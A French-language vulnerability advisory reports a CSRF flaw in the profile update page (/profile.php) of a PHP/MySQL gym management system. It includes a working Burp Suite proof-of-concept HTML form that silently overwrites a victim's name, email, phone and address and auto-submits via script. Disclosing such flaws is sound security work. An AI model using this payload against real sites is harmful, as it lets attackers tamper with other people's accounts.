
Système de gestion de salle de sport utilisant PHP et MYSQL
Un système de gestion de salle de sport construit avec PHP et MySQL.
Shoaib Alam - Profil LinkedIn
Une vulnérabilité de type Cross-Site Request Forgery (CSRF) a été identifiée dans le système de gestion de salle de sport. Ce problème est présent dans la fonctionnalité de mise à jour du profil du panneau utilisateur.
L'application manque actuellement de l'implémentation de jetons Anti-CSRF, ce qui la rend vulnérable aux attaques de type Cross-Site Request Forgery (CSRF). Cette faiblesse de sécurité affecte spécifiquement le point de terminaison /profile.php. Un attaquant peut exploiter cette faille pour effectuer des modifications non autorisées d'informations sensibles de l'utilisateur, telles que l'adresse, le nom et le numéro de téléphone. Cela pourrait potentiellement compromettre l'intégrité des comptes utilisateur et entraîner d'autres problèmes de sécurité.
Point de terminaison vulnérable : /profile.php
Voici une preuve de concept démontrant la vulnérabilité CSRF. Cette PoC a été générée à l'aide de Burp Suite Professional.
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="http://localhost/gym/profile.php" method="POST">
<input type="hidden" name="fname" value="hacked" />
<input type="hidden" name="lname" value="victim" />
<input type="hidden" name="email" value="attacker@gmail.com" />
<input type="hidden" name="mobile" value="9999999999" />
<input type="hidden" name="state" value="hacked" />
<input type="hidden" name="city" value="hacked" />
<input type="hidden" name="address" value="hacked" />
<input type="hidden" name="submit" value="Update" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>